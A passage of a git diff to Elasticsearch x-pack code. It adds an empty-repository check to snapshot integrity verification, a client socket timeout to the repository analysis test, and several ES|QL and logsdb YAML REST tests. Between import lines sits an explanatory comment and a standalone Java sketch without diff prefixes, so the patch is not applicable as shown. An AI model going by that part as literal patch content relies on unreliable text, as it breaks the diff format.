a/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java b/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java index 0929561909963..bb03585a8fdfe 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java +++ b/x-pack/plugin/snapshot-repo-test-kit/qa/minio/src/javaRestTest/java/org/elasticsearch/repositories/blobstore/testkit/analyze/MinioRepositoryAnalysisRestIT.java @@ -33,6 +33,11 @@ public class MinioRepositoryAnalysisRestIT extends AbstractRepositoryAnalysisRes .keystore("s3.client.repository_test_kit.secret_key", "s3_test_secret_key") .setting("s3.client.repository_test_kit.endpoint", minioFixture::getAddress) .setting("xpack.security.enabled", "false") + // Skip listing of pre-existing uploads during a CAS because MinIO sometimes leaks them; also reduce the delay before proceeding + // TODO do not set these if running a MinIO version in which https://github.com/minio/minio/issues/21189 + // and https://github.com/minio/minio/issues/21456 are both fixed + .setting("repository_s3.compare_and_exchange.time_to_live", "-1") + .setting("repository_s3.compare_and_exchange.anti_contention_delay", "100ms") .setting("xpack.ml.enabled", "false") .build(); diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java b/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java index 298dcd9ed94c5..e446a5000b7bb 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/internalClusterTest/java/org/elasticsearch/repositories/blobstore/testkit/integrity/RepositoryVerifyIntegrityIT.java @@ -14,6 +14,7 @@ import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.client.Request; import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; @@ -35,6 +36,7 @@ import org.elasticsearch.repositories.blobstore.RepositoryFileType; import org.elasticsearch.repositories.blobstore.testkit.SnapshotRepositoryTestKit; import org.elasticsearch.repositories.fs.FsRepository; +import org.elasticsearch.rest.RestStatus; import org.elasticsearch.snapshots.AbstractSnapshotIntegTestCase; import org.elasticsearch.snapshots.SnapshotId; import org.elasticsearch.snapshots.SnapshotInfo; @@ -73,6 +75,7 @@ import static org.elasticsearch.repositories.blobstore.BlobStoreRepository.SNAPSHOT_FORMAT; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.hamcrest.Matchers.allOf; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; @@ -713,6 +716,21 @@ public void testBlobInSnapshotNotShardGeneration() throws IOException { }, "blob in snapshot but 
not shard generation"); } + public void testFreshRepository() { + final var repositoryName = randomIdentifier(); + final var repositoryRootPath = randomRepoPath(); + + createRepository(repositoryName, FsRepository.TYPE, repositoryRootPath); + try { + final var request = new Request("POST", "/_snapshot/" + repositoryName + "/_verify_integrity"); + final var responseException = expectThrows(ResponseException.class, () -> getRestClient().performRequest(request)); + assertEquals(RestStatus.BAD_REQUEST.getStatus(), responseException.getResponse().getStatusLine().getStatusCode()); + assertThat(responseException.getMessage(), containsString("repository is empty, cannot verify its integrity")); + } finally { + deleteRepository(repositoryName); + } + } + private void runInconsistentShardGenerationBlobTest( TestContext testContext, UnaryOperator shardGenerationUpdater, diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java b/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java index 57f77cb8441d7..b2cfd7e4f91bb 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/main/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityAction.java @@ -132,6 +132,7 @@ public void writeResponseChunk(RepositoryVerifyIntegrityResponseChunk responseCh .newForked(l -> repository.getRepositoryData(executor, l)) .andThenApply(repositoryData -> { + ensureValidGenId(repositoryData.getGenId()); final var cancellableThreads = new CancellableThreads(); task.addListener(() -> cancellableThreads.cancel("task cancelled")); final var verifier = new RepositoryIntegrityVerifier( @@ -155,4 +156,17 @@ public void writeResponseChunk(RepositoryVerifyIntegrityResponseChunk responseCh .andThen((l, repositoryIntegrityVerifier) -> repositoryIntegrityVerifier.start(l)) .addListener(listener); } + + static void ensureValidGenId(long repositoryGenId) { + if (repositoryGenId == RepositoryData.EMPTY_REPO_GEN) { + throw new IllegalArgumentException("repository is empty, cannot verify its integrity"); + } + if (repositoryGenId < 0) { + final var exception = new IllegalStateException( + "repository is in an unexpected state [" + repositoryGenId + "], cannot verify its integrity" + ); + assert false : exception; // cannot be unknown, and if corrupt we throw a corruptedStateException from getRepositoryData + throw exception; + } + } } diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java index a971772975128..69ab919ec3392 100644 --- a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java +++ b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/analyze/AbstractRepositoryAnalysisRestTestCase.java @@ -7,9 +7,12 @@ package org.elasticsearch.repositories.blobstore.testkit.analyze; +import org.apache.http.client.config.RequestConfig; 
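A note on the repository-analyze test change in this hunk: the analyze call may legitimately run for the full server-side timeout, so the client's socket timeout is widened to exceed it by 10 seconds, letting the server's own timeout error surface instead of a client-side SocketTimeoutException. A minimal sketch of the same pattern, using only the low-level REST client and Apache HttpClient APIs that already appear in this diff (the repository name is a placeholder):

import org.apache.http.client.config.RequestConfig;
import org.elasticsearch.client.Request;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.core.TimeValue;

class AnalyzeTimeoutSketch {
    // Build an analyze request whose client-side socket timeout exceeds the
    // server-side timeout by 10 seconds, so the server's own timeout response
    // wins the race against the client giving up.
    static Request analyzeRequest(String repository) { // repository name is a placeholder
        TimeValue serverTimeout = TimeValue.timeValueSeconds(120);
        Request request = new Request("POST", "/_snapshot/" + repository + "/_analyze");
        request.addParameter("timeout", serverTimeout.getStringRep());
        request.setOptions(
            RequestOptions.DEFAULT.toBuilder()
                .setRequestConfig(RequestConfig.custom().setSocketTimeout(Math.toIntExact(serverTimeout.millis() + 10_000)).build())
        );
        return request;
    }
}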
import org.apache.http.client.methods.HttpPost; import org.elasticsearch.client.Request; +import org.elasticsearch.client.RequestOptions; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.TimeValue; import org.elasticsearch.test.rest.ESRestTestCase; public abstract class AbstractRepositoryAnalysisRestTestCase extends ESRestTestCase { @@ -26,12 +29,18 @@ public void testRepositoryAnalysis() throws Exception { logger.info("creating repository [{}] of type [{}]", repository, repositoryType); registerRepository(repository, repositoryType, true, repositorySettings); + final TimeValue timeout = TimeValue.timeValueSeconds(120); final Request request = new Request(HttpPost.METHOD_NAME, "/_snapshot/" + repository + "/_analyze"); request.addParameter("blob_count", "10"); request.addParameter("concurrency", "4"); request.addParameter("max_blob_size", randomFrom("1mb", "10mb")); - request.addParameter("timeout", "120s"); + request.addParameter("timeout", timeout.getStringRep()); request.addParameter("seed", Long.toString(randomLong())); + request.setOptions( + RequestOptions.DEFAULT.toBuilder() + .setRequestConfig(RequestConfig.custom().setSocketTimeout(Math.toIntExact(timeout.millis() + 10_000)).build()) + ); + assertOK(client().performRequest(request)); } diff --git a/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java new file mode 100644 index 0000000000000..9eeee8ba6e24b --- /dev/null +++ b/x-pack/plugin/snapshot-repo-test-kit/src/test/java/org/elasticsearch/repositories/blobstore/testkit/integrity/TransportRepositoryVerifyIntegrityActionTests.java @@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.repositories.blobstore.testkit.integrity; + +import org.elasticsearch.repositories.RepositoryData; +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; + +public class TransportRepositoryVerifyIntegrityActionTests extends ESTestCase { + public void testEnsureValidGenId() { + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(0); + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(randomNonNegativeLong()); + assertThat( + expectThrows( + IllegalArgumentException.class, + () -> TransportRepositoryVerifyIntegrityAction.ensureValidGenId(RepositoryData.EMPTY_REPO_GEN) + ).getMessage(), + equalTo("repository is empty, cannot verify its integrity") + ); + assertThat(expectThrows(IllegalStateException.class, () -> { + try { + TransportRepositoryVerifyIntegrityAction.ensureValidGenId(RepositoryData.CORRUPTED_REPO_GEN); + } catch (AssertionError e) { + // if assertions disabled, we throw the cause directly + throw e.getCause(); + } + }).getMessage(), equalTo("repository is in an unexpected state [-3], cannot verify its integrity")); + } +} diff --git a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java index 68ac10801a40d..3e2d2827ce614 100644 --- a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java +++ b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/index/query/ShapeQueryBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeometryParser; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -176,6 +175,6 @@ public static ShapeQueryBuilder fromXContent(XContentParser parser) throws IOExc @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java index 7c8b1545a3a94..9614070bf3339 100644 --- a/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java +++ b/x-pack/plugin/spatial/src/main/java/org/elasticsearch/xpack/spatial/search/aggregations/GeoLineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.spatial.search.aggregations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.DataStream; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -212,6 +211,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml index 5b0492f9e847e..b9d20d4cd40cf 100644 --- 
a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/10_basic.yml @@ -555,11 +555,11 @@ FROM EVAL SORT LIMIT with documents_found: - method: POST path: /_query parameters: [ ] - capabilities: [ parameter_for_limit ] + capabilities: [ normalized_limit_error_message ] reason: "named or positional parameters for field names" - do: - catch: "/Invalid value for LIMIT \\[foo: String\\], expecting a non negative integer/" + catch: "/value of \\[limit \\?l\\] must be a non negative integer, found value \\[\\?l\\] type \\[keyword\\]/" esql.query: body: query: 'from test | limit ?l' diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml index 3df912715434f..4e714a0c8eff6 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/160_union_types.yml @@ -913,8 +913,8 @@ suggested_type: - method: POST path: /_query parameters: [] - capabilities: [recommended_cast] - reason: "uses recommended_cast" + capabilities: [suggested_cast, implicit_casting_date_and_date_nanos] + reason: "date and date_nanos should no longer produce suggested_cast column" - do: indices.create: @@ -969,9 +969,7 @@ suggested_type: - match: { columns.0.original_types: ["aggregate_metric_double", "long"] } - match: { columns.0.suggested_cast: "aggregate_metric_double" } - match: { columns.1.name: "my_date" } - - match: { columns.1.type: "unsupported" } - - match: { columns.1.original_types: ["date_nanos", "datetime"] } - - match: { columns.1.suggested_cast: "date_nanos" } + - match: { columns.1.type: "date_nanos" } - match: { columns.2.name: "my_double" } - match: { columns.2.type: "double" } - is_false: columns.2.original_types diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml index be9163bd2a2fa..3e0eb4f3d07c8 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/220_explain.yml @@ -6,7 +6,7 @@ setup: - method: POST path: /_query parameters: [] - capabilities: [explain] + capabilities: [explain, no_brackets_in_unquoted_index_names] reason: "new EXPLAIN command" - do: indices.create: @@ -86,6 +86,29 @@ explainQuery: - match: { values.2.0: "coordinator" } - match: { values.2.1: "optimizedPhysicalPlan" } +--- +explainFrom: + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'EXPLAIN (from test)' + + - length: { columns: 3 } + - match: {columns.0.name: "role"} + - match: {columns.0.type: "keyword"} + - match: {columns.1.name: "type"} + - match: {columns.1.type: "keyword"} + - match: {columns.2.name: "plan"} + - match: {columns.2.type: "keyword"} + - length: { values: 3 } + - match: { values.0.0: "coordinator" } + - match: { values.0.1: "parsedPlan" } + - match: { values.1.0: "coordinator" } + - match: { values.1.1: "optimizedLogicalPlan" } + - match: { values.2.0: "coordinator" } + - match: { values.2.1: "optimizedPhysicalPlan" } --- explainDownstream: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml 
b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml index 8d394dee4acd4..e4a6ebc966a8a 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/40_tsdb.yml @@ -707,3 +707,27 @@ to_aggregate_metric_double with multi_values: - match: {values.0.1: '{"min":102.44400024414062,"max":195.10000610351562,"sum":297.54400634765625,"value_count":2}'} - match: {values.0.2: '{"min":64.0,"max":1456.0,"sum":2139.0,"value_count":4}'} - match: {values.0.3: '{"min":123.0,"max":1.9418924E7,"sum":1.9433032E7,"value_count":3}'} + +--- +avg of aggregate_metric_double: + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_avg] + reason: "support avg aggregations with aggregate metric double" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'FROM test2 | STATS avg = avg(agg_metric) | KEEP avg' + + - length: {values: 1} + - length: {values.0: 1} + - match: {columns.0.name: "avg"} + - match: {columns.0.type: "double"} + - match: {values.0.0: 4.904761904761905} diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml index ee1a381c6e589..726921ffd09f7 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/46_downsample.yml @@ -251,3 +251,111 @@ setup: - match: {values.0.1: 800479.0} - match: {values.0.2: 4812452.0} - match: {values.0.3: 6} + +--- +"Sort from multiple indices one with aggregate metric double": + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_sorting_fixed] + reason: "Fix sorting for rows comprised of docs from multiple indices where agg metric is missing from some" + + - do: + indices.downsample: + index: test + target_index: test-downsample + body: > + { + "fixed_interval": "1h" + } + - is_true: acknowledged + + - do: + indices.create: + index: test-2 + body: + mappings: + properties: + some_field: + type: keyword + + - do: + bulk: + refresh: true + index: test-2 + body: + - '{"index": {}}' + - '{"some_field": "im a keyword!!!!!"}' + + - do: + esql.query: + body: + query: "FROM test-* | SORT some_field, @timestamp, k8s.pod.uid | KEEP k8s.pod.network.rx, some_field, @timestamp | LIMIT 10" + + - length: {values: 5} + - length: {values.0: 3} + - match: {columns.0.name: "k8s.pod.network.rx"} + - match: {columns.0.type: "aggregate_metric_double"} + - match: {columns.1.name: "some_field"} + - match: {columns.1.type: "keyword"} + - match: {columns.2.name: "@timestamp"} + - match: {columns.2.type: "date"} + - match: {values.0.0: null} + - match: {values.0.1: "im a keyword!!!!!"} + - match: {values.0.2: null} + - match: {values.1.0: '{"min":801479.0,"max":802133.0,"sum":1603612.0,"value_count":2}'} + - match: {values.1.1: null} + - match: {values.1.2: "2021-04-28T18:00:00.000Z"} + - match: {values.2.0: '{"min":530575.0,"max":530600.0,"sum":1061175.0,"value_count":2}'} + - match: {values.2.1: null} + - match: {values.2.2: "2021-04-28T18:00:00.000Z"} + - match: {values.3.0: '{"min":530604.0,"max":530605.0,"sum":1061209.0,"value_count":2}'} + - match: {values.3.1: 
null} + - match: {values.3.2: "2021-04-28T19:00:00.000Z"} + - match: {values.4.0: '{"min":802337.0,"max":803685.0,"sum":1606022.0,"value_count":2}'} + - match: {values.4.1: null} + - match: {values.4.2: "2021-04-28T20:00:00.000Z"} + +--- +"MV_EXPAND on non-MV aggregate metric double": + - requires: + test_runner_features: [capabilities] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [aggregate_metric_double_mv_expand] + reason: "Have MV_EXPAND not error out when applied to aggregate_metric_doubles (is a no-op)" + + - do: + indices.downsample: + index: test + target_index: test-downsample + body: > + { + "fixed_interval": "1h" + } + - is_true: acknowledged + + - do: + esql.query: + body: + query: "FROM test-downsample | MV_EXPAND k8s.pod.network.rx | SORT @timestamp, k8s.pod.uid | KEEP k8s.pod.network.rx, @timestamp | LIMIT 10" + + - length: {values: 4} + - length: {values.0: 2} + - match: {columns.0.name: "k8s.pod.network.rx"} + - match: {columns.0.type: "aggregate_metric_double"} + - match: {columns.1.name: "@timestamp"} + - match: {columns.1.type: "date"} + - match: {values.0.0: '{"min":801479.0,"max":802133.0,"sum":1603612.0,"value_count":2}'} + - match: {values.0.1: "2021-04-28T18:00:00.000Z"} + - match: {values.1.0: '{"min":530575.0,"max":530600.0,"sum":1061175.0,"value_count":2}'} + - match: {values.1.1: "2021-04-28T18:00:00.000Z"} + - match: {values.2.0: '{"min":530604.0,"max":530605.0,"sum":1061209.0,"value_count":2}'} + - match: {values.2.1: "2021-04-28T19:00:00.000Z"} + - match: {values.3.0: '{"min":802337.0,"max":803685.0,"sum":1606022.0,"value_count":2}'} + - match: {values.3.1: "2021-04-28T20:00:00.000Z"} diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml index 8a5d3be6758e3..c8f3c15400b9e 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_enrich.yml @@ -191,3 +191,59 @@ teardown: - match: { values.1: [ "Bob", "New York", "nyc", "USA" ] } - match: { values.2: [ "Denise", "Tan Son Nhat", null, null ] } - match: { values.3: [ "Mario", "Rome", "rom", "Italy" ] } + + +--- +"Enrich with brackets in policy name": + - requires: + test_runner_features: [capabilities, allowed_warnings_regex] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [ no_brackets_in_unquoted_index_names ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | enrich "city_codes_policy)" on city_id | keep name, city, country | sort name' + catch: "bad_request" + + - match: { status: 400 } + - match: { error.type: verification_exception } + - match: { error.reason: "/.*cannot.find.enrich.policy.*/" } + + +--- +"Enrich in fork": + - requires: + test_runner_features: [capabilities, allowed_warnings_regex] + capabilities: + - method: POST + path: /_query + parameters: [] + capabilities: [ no_brackets_in_unquoted_index_names, fork_v9 ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | eval city_code = city_id | FORK (enrich city_codes_policy) (where false) | keep name, city, country | sort name' + + - match: { columns.0.name: "name" } + - match: { columns.0.type: "keyword" } + - match: 
{ columns.1.name: "city" } + - match: { columns.1.type: "text" } + - match: { columns.2.name: "country" } + - match: { columns.2.type: "keyword" } + + - length: { values: 4 } + - match: { values.0: [ "Alice", "New York", "USA" ] } + - match: { values.1: [ "Bob", "New York", "USA" ] } + - match: { values.2: [ "Denise", null, null ] } + - match: { values.3: [ "Mario", "Rome", "Italy" ] } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml index 1276f026ffdf7..72b518e2228ee 100644 --- a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/60_usage.yml @@ -146,7 +146,7 @@ setup: - do: {xpack.usage: {}} - match: { esql.available: true } - match: { esql.enabled: true } - - length: { esql.features: 26 } + - length: { esql.features: 27 } - set: {esql.features.dissect: dissect_counter} - set: {esql.features.drop: drop_counter} - set: {esql.features.eval: eval_counter} @@ -228,7 +228,7 @@ setup: - gt: {esql.functions.to_long: $functions_to_long} - match: {esql.functions.coalesce: $functions_coalesce} - gt: {esql.functions.categorize: $functions_categorize} - - length: {esql.functions: 146} # check the "sister" test above for a likely update to the same esql.functions length check + - length: {esql.functions: 137} # check the "sister" test above for a likely update to the same esql.functions length check --- took: diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml new file mode 100644 index 0000000000000..04db9037d2054 --- /dev/null +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/esql/61_enrich_bracket.yml @@ -0,0 +1,111 @@ +--- +setup: + - skip: + awaits_fix: "https://github.com/elastic/elasticsearch/issues/130740" + - requires: + cluster_features: ["gte_v8.11.0"] + reason: "ESQL is available in 8.11+" + test_runner_features: allowed_warnings_regex + - do: + indices.create: + index: cities + body: + settings: + number_of_shards: 5 + mappings: + properties: + city_code: + type: keyword + city: + type: text + country: + type: keyword + + - do: + bulk: + index: cities + refresh: true + body: + - { "index": { } } + - { "city_code": "nyc", "city": "New York", "country": "USA" } + - { "index": { } } + - { "city_code": "rom", "city": "Rome", "country": "Italy" } + + - do: + enrich.put_policy: + name: city_codes)policy + body: + match: + indices: [ "cities" ] + match_field: "city_code" + enrich_fields: [ "city", "country" ] + + + - do: + enrich.execute_policy: + name: city_codes)policy + + + - do: + indices.create: + index: test + body: + mappings: + properties: + name: + type: keyword + city_id: + type: keyword + city_name: + type: text + - do: + bulk: + index: test + refresh: true + body: + - { "index": { } } + - { "name": "Alice", "city_id": "nyc", "city_name": "New York" } + - { "index": { } } + - { "name": "Bob", "city_id": "nyc", "city_name": "New York" } + - { "index": { } } + - { "name": "Mario", "city_id": "rom", "city_name": "Rome" } + - { "index": { } } + - { "name": "Denise", "city_id": "sgn", "city_name": "Tan Son Nhat" } + + +--- +teardown: + - do: + enrich.delete_policy: + name: city_codes)policy + +--- +"Enrich on keyword": + - requires: + test_runner_features: [ capabilities, allowed_warnings_regex ] + capabilities: + - 
method: POST + path: /_query + parameters: [ ] + capabilities: [ no_brackets_in_unquoted_index_names ] + reason: "Change in the grammar" + + - do: + allowed_warnings_regex: + - "No limit defined, adding default limit of \\[.*\\]" + esql.query: + body: + query: 'from test | enrich "city_codes)policy" on city_id | keep name, city, country | sort name' + + - match: { columns.0.name: "name" } + - match: { columns.0.type: "keyword" } + - match: { columns.1.name: "city" } + - match: { columns.1.type: "text" } + - match: { columns.2.name: "country" } + - match: { columns.2.type: "keyword" } + + - length: { values: 4 } + - match: { values.0: [ "Alice", "New York", "USA" ] } + - match: { values.1: [ "Bob", "New York", "USA" ] } + - match: { values.2: [ "Denise", null, null ] } + - match: { values.3: [ "Mario", "Rome", "Italy" ] } diff --git a/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml new file mode 100644 index 0000000000000..0a56c6d74215c --- /dev/null +++ b/x-pack/plugin/src/yamlRestTest/resources/rest-api-spec/test/logsdb/20_synthetic_source.yml @@ -0,0 +1,149 @@ +--- +synthetic_source match_only_text with wildcard as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: wildcard + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with number as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: long + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: [1, 5] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: 1 5 + + - match: { "hits.total.value": 0 } + + - do: + indices.create: + index: stored_source_test + body: + mappings: + properties: + foo: + type: long + fields: + text: + type: match_only_text + + - do: + index: + index: stored_source_test + id: "1" + refresh: true + body: + foo: [1, 5] + + - do: + search: + index: stored_source_test + body: + query: + match_phrase: + foo.text: 1 5 + + - match: { "hits.total.value": 0 } + +--- +synthetic_source match_only_text with scaled_float as parent field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: scaled_float + scaling_factor: 10 + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + 
